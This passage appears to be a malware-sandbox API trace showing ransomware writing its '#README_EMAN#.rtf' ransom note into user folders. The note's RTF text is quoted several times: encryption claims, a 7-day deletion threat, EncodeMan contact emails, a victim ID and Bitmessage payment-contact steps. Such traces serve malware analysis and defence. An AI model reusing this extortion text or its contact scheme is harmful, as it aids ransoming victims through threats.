Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.668] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.669] CloseHandle (hObject=0x2c8) returned 1 [0281.669] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\#readme_eman#.rtf")) returned 0xffffffff [0281.669] GetLastError () returned 0x2 [0281.669] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\hy\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0281.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to 